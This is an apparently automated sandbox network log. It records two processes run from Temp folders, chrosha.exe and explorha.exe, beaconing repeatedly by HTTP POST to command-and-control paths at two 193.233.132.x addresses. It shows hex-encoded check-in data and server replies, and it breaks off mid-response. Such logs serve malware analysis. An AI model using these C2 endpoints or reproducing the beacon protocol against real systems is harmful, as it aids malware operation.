                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:35.972822905 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
353 | 192.168.2.5 | 50196 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:35.886825085 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:36.140080929 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
354 | 192.168.2.5 | 50197 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:36.338838100 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:36.586311102 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
355 | 192.168.2.5 | 50198 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:36.515037060 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:36.763463020 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
356 | 192.168.2.5 | 50199 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:36.840464115 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:37.094368935 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
357 | 192.168.2.5 | 50200 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:37.022990942 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:37.276845932 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
358 | 192.168.2.5 | 50201 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:37.459860086 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:37.704828978 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
359 | 192.168.2.5 | 50202 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:37.633476973 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:37.878118992 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      360 | 192.168.2.5 | 50203 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:37.959350109 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:38.209850073 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      361 | 192.168.2.5 | 50204 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:38.140732050 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:38.395939112 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      362 | 192.168.2.5 | 50205 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:38.568617105 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:38.812623024 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      363 | 192.168.2.5 | 50207 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:38.772507906 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:39.020409107 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      364 | 192.168.2.5 | 50208 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:39.060906887 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:39.308111906 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      365 | 192.168.2.5 | 50209 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:39.385586023 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:39.629930019 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
366 | 192.168.2.5 | 50210 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:39.668561935 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:31:39.917165995 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:31:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
367 | 192.168.2.5 | 50211 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:39.877302885 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:40.121835947 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:31:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
368 | 192.168.2.5 | 50212 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:40.182116985 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:40.437736988 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:31:40 GMT
